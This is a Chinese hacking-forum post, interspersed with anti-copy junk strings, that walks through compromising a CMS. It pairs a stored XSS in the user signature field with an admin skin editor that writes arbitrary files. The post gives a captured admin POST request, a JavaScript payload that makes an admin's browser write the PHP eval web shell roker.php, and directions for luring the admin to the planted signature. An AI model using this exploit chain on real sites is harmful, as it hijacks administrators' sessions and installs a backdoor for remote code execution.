|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题
% `) O; t/ Q6 `2 }* t% C官网已经修补了,所以重新下了源码
% z) B' D$ ~* e# q/ D因为 后台登入 还需要认证码 所以 注入就没看了。
' R5 T4 D/ K6 t) M; ^存在 xss
4 i6 M6 i3 }& {# t. I+ R漏洞文件 user/member/skin_edit.php5 M# a1 Y* y7 _
本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
& x; Z9 M, E8 @
& d2 ?1 w8 G4 S1 f6 b9 p1 n</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
8 {* ^$ z4 F! S0 i
& R7 Q8 }) q) u1 T</textarea></td></tr>
" Q0 V: o9 H' A3 g 8 a2 k3 K& {5 A# _( ^* |' s
user/do.php % K: X* n# t% z* N/ @4 y+ K3 M. X: Q
) V. J6 t2 K+ L9 j0 o
& y3 u5 J- ~* x ~! q6 G2 Z2 Iif($op=='zl'){ //资料
q5 Q3 J# R& x* t! K6 w _9 B 5 v: ]) }- O' j& s; n
if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
' t: y) t9 I8 e exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));8 O! z5 k* T+ G U0 @) l
. @8 `* e) j8 D$ T0 I, m) m* Q $sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',
3 S; _" u$ ^/ W( h* P$ J3 E8 D 5 Y$ `/ D) x! d3 Z8 a9 ^
CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'& U# ~5 C1 ~% M0 R
where CS_Name='".$cscms_name."'";
& C; Z5 D" o7 d% u, Z
3 T ?7 A) z! ?( v) u4 h, I if($db->query($sql)){$ w" {0 _1 u4 C* d& d2 G5 l) C2 _
* P+ g5 J" A$ ]7 H+ o0 e5 U
exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));5 Y' p) g9 o5 ]2 h; p4 ~; J9 ]
6 G; I# ~; D5 m! y3 |" Z' {8 G }else{, V ^4 v9 n7 f* t' V* B) g
6 K& x3 m7 ^- x
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));
8 |6 F0 Q' A( M) Q0 b6 @- z; B, Q + |( p0 o E- C7 P2 t0 Q
}
$ @4 H- v% A8 F$ D! g
, l/ T- R) d7 U) G% ]3 Z
2 N5 W" ?! X7 Q# i6 ]没有 过滤导致xss产生。 T) u# v* R5 u* [; }
后台 看了下 很奇葩的是可以写任意格式文件。。9 ~' U7 ?4 T8 m9 G' h
抓包。。6 o! N% B+ O0 D: a) H
' T9 `* Z' J& E0 O. m3 g
& C% w( r# ?. W0 h' @本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
9 [, F* X$ N5 D1 K/ p
7 C3 g; d4 V# Z {1 vAccept: text/html, application/xhtml+xml, */*4 \" J) C7 C8 e" U
- @7 c2 Z8 W, |: W2 ~2 u5 ~: ZReferer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php0 U7 @8 k& @( D9 |3 z5 z9 H
! U6 O( ~8 R% j- i
Accept-Language: zh-CN
2 `0 H: b7 R7 c# U) `" l# e
0 _# F' j! o9 ]' \User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
1 B5 D$ ]0 X; y- v. J 6 {2 j8 t9 y! i9 M! S7 Y, V' C
Content-Type: application/x-www-form-urlencoded
9 }: h, N$ A. v- F/ v8 C3 {
6 Q9 l" |/ |7 `, pAccept-Encoding: gzip, deflate; g( L9 d6 J9 x* W( W
% [. `# b- j; @- a! E/ j
Host: 127.0.0.1
. I6 z4 U# q( I/ f/ Q5 T; e $ ~9 p" m& Z& F, ~
Content-Length: 38
* i7 S- i# Q% O% x. S. b1 T 4 c2 n6 Q2 C1 n/ O8 O; \- p
DNT: 1
9 X, }4 {1 F- @7 P) t; \2 M( D
8 @# @5 X1 b- O' T! `Connection: Keep-Alive
% ?0 D5 }( j' Z, ^0 h + }: ?( `& w5 N* E5 p: e$ p+ ]( T
Cache-Control: no-cache
4 Q+ R! ?6 h9 I$ O* X9 P: B
3 o/ | v' x" C$ Y7 S. j" QCookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594
' d/ x6 g! S, Z9 M- v , U) g& j6 u' j# m! Z
& z3 z/ a1 k0 v8 g7 s- k8 Oname=aaa.php&content=%3Cs%3E%3Ca%25%3E
. v: T8 G9 X) r, n. M; o ~$ o( m1 n0 v! D9 a4 t! Y% p- ?
! ~: }) G: l6 q& b
* S0 { T+ n; q: X! l
于是 构造js如下。
: [6 s6 K' `0 ]+ X" F j3 w4 A# W" [7 S0 w' D! a. t
本帖隐藏的内容<script>
& ?& E1 ?/ m* }7 W1 C; J1 U3 I) NthisTHost = top.location.hostname;; s% `/ O4 v2 k/ H
( E. Q8 k* s7 f" V3 T" Q
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";. v& u0 C/ R |6 N. L; X c
4 e+ _' u9 v" M/ j2 B
function PostSubmit(url, data, msg) {
$ c8 w4 W ]% A& m var postUrl = url;
0 U' i6 G( P. Z( u: b; t$ K
2 Z4 N+ |* A( ^( L var postData = data; ( r# ~4 U5 E# \1 D
var msgData = msg;
% G# Z8 ?) `- m" Q$ n) Z$ Q var ExportForm = document.createElement("FORM");
) q! X- E$ }4 X; k document.body.appendChild(ExportForm); * ^/ c' h( M8 s7 O
ExportForm.method = "POST";
/ q0 u5 Z! j' C; h3 c% H var newElement = document.createElement("input");
( K9 |3 f M8 ]; Z% b1 t; D$ S: P& d newElement.setAttribute("name", "name"); 6 {2 E( i0 C) H' x; C/ V
newElement.setAttribute("type", "hidden"); / E5 t- T5 s1 o) U1 P' g- t
var newElement2 = document.createElement("input");
5 q2 a+ T; \8 B E% | newElement2.setAttribute("name", "content"); 2 g: h- I5 U" n9 C0 w) Z
newElement2.setAttribute("type", "hidden");
3 l$ u+ T7 Q+ B6 u ExportForm.appendChild(newElement);
( I# _! u, u0 u; Z- Z& O! u ExportForm.appendChild(newElement2); + u5 g, G: i3 M( t- h1 _/ `
newElement.value = postData;
3 ` P: Y( A: H5 c) D1 U! G' ~ newElement2.value = msgData; e* h% z+ F" U2 k8 S; a
ExportForm.action = postUrl;
+ M; A( r& g/ F( n: ^0 E ExportForm.submit(); 0 ~; P0 @# Z4 c" o
};7 k. v: \# p* {/ v+ w: d; O
/ t; O8 L) Z$ [3 |( C8 u) g8 Y5 _PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");' G% f; l( z7 |! {
7 w8 g6 k8 j& @: W3 b7 A1 s
</script>- Z R5 P h5 @- v3 n- Q' G
3 ~; A/ M( f p/ e3 m
% b3 ?8 I9 A0 S7 p6 k" ~2 O( z, K( j2 A c4 i( ]
http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入7 C; k0 V8 D' q3 E, d
用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)2 t v3 C7 m; q; g
就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
, |& @9 d m& |$ K# k; o |
|